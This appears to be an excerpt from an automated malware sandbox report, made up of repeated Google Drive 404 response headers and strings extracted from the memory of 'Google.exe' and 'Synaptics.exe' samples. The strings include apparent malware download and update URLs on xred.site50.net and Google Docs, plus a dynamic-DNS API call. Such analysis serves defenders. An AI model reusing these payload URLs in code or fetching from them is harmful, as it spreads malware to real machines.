                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6OnanEyfqEkrXNkyjL_EgjU1fu08Ou4I5ovrHj2qsm0x9gUugsSx6NkQaVkrtYRIJZP7wonxQContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:28 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-MTSlrFDNlqnLJc0AQ3kEIA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5GnGBM34Z7_fi3jfHp9HkEs5erH_ARtDh9ZW95mbIjRyDGMuEg492Q2FT5F8UME-lWF7sJ0h8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:28 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZBafTkXSeGXzYMe8GsOeJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ZVfh0Q2sQvoGp41Ux60bAPCMNy-VZufwd4qvpH66WRSzhcsX5nf5gaNBVzpyuFKuOlpiwlZEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:29 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-KfEWJMF8clbC745MJu6gqg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Z-O_KFXvfTAkyX0H9hfRCIrKi2iLmxUEqYZrM4zcafeTGI0htOo6B4PId7SNb_D09Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:30 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-NJ-x29u1oiqGUrAXRCcEVg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5a02U6ysn_4qrSXAtedSaaCZQUwsm0NfAWR7kjyUTKzQZxggsOhVOCevnSqpm3ZaYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:30 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-eVEFg-HthPR7f3TN5UEF9Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC70UXfSN0hPKnjvrGEVbXCl7rQb3tOgqmZlOQgLqBbId1z50ckXk7lGMMScYuMzUZISdtJmbCAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:31 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-ZaIr72TnGkFuieVndzZRRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ogjUUugycm-xEM6ooaReSrpZURItLfwtX-dBj-sRJM5d-t5dpLePtgX3vW70YrjLTContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:32 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-l0TYcquW2wITTnt6rbcQMA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5L7NlTst3DL5qdiNfvXQNFnil5neIaDTQuc8AUZqVlr_NAhnvV1RrqSOGeJg13_EqfakObQvkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:33 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-QO287XY7icU7Z8YK6kZung' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6zpodd2hagXLPNtTXgK7XVBto-96dmsnuCMONkZSYc1FOWAbCntxoq_oKuVMN0Rj9KContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:34 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-soskQh1BiELD3SyERorRjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7wdSZQVC7KMzk14ngZ1Zz-N4gCFQhMgPcMtgW0PdUEEnuwS9XX77uFGE62Qf5_MtmNkCyrVTYContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:34 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-nnZcSL90zrwRLgG55bZnvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4D2NBFR6SlhJGHMivxuq1SU9p6MXu61SymLxPeFtsX3VkwDBZ-6YTPvc_eR91L8X9PContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:35 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-0pQhTaqyfAz4g-opr9Ig9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4OtpL7z5fWexMbHuEiftV6LdCYdca-hfHeXSEfLDMtCIfewsNFrQywmUAgkGWOzSvHContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:37 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-aceapL0f2xT4rbJ-vwjXWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC53mI4p_oZHXSmfQFBz2z8mesW-SX5ISIV4CHrCUGsZ7AJuQtjkeIVY41AC_xaF-OGaJMCWmp4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:37 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-5d6WjklBDifYyXrafNPKPw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4kuXmZOtbgZF1WC3DCZWn6qI4XXYVF2MlTYmjpTZ7Y6gLmF_LtNsoInvdzTHp6zFELContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:38 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-eJSLnBZjCc6rhgrGvqk50Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7k9NtNyyS8VkhSNuqkmtEzgsd0mD-S-6_fswwXNEXFgSxdacY1NsBKrNRtlwu8HtXq4HS8QKwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:52:38 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-p3y0MaYD4eflJRPrHSJZJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                            Source: Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2975599142.0000000004DB8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.000000000089F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978D9L4mj
                            Source: ._cache_Google.exe, 00000002.00000002.2949109717.00000000013D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-score.com/checkip/
                            Source: Google.exe, 00000001.00000003.1743429618.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dl
                            Source: Google.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dld
                            Source: Google.exe, 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                            Source: Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                            Source: Google.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                            Source: Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                            Source: Google.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                            Source: Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000007056000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000005.00000002.2039578728.000000000076F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.0000000000878000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.0000000000918000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2953691114.00000000008DE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/1
                            Source: Synaptics.exe, 00000005.00000002.2039578728.00000000006E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8
                            Source: Synaptics.exe, 00000005.00000002.2048249910.00000000053FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/8y
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000007056000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3057921806.000000001D895000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/a
                            Source: Synaptics.exe, 0000001D.00000002.2993567554.000000000721B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/d
                            Source: Synaptics.exe, 0000001D.00000002.3055866183.000000001D83E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/eme
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000007056000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/google.com/
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000007056000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/user
                            Source: Synaptics.exe, 00000005.00000002.2051658236.0000000007056000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/u
                            Source: Synaptics.exe, 00000005.00000002.2042900507.0000000004D9E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3039904532.00000000193FE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3028942796.000000001417E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3000815859.000000000B0AE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3024496824.0000000011AFE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3018110430.000000000ECEE000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.3002897945.000000000BFAE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0;
                            Source: Google.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downlo
                            Source: Google.exe, 00000001.00000000.1725463339.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Synaptics.exe, Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
                            Source: Synaptics.exe, 00000005.00000002.2040812278.00000000021C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 0000001D.00000002.2959674730.00000000022A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=downloadN
                            Source: Google.exe, 0000001A.00000003.2270153764.00000000023A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downlo0
                            Source: Google.exe, 00000001.00000003.1743429618.0000000002290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloX
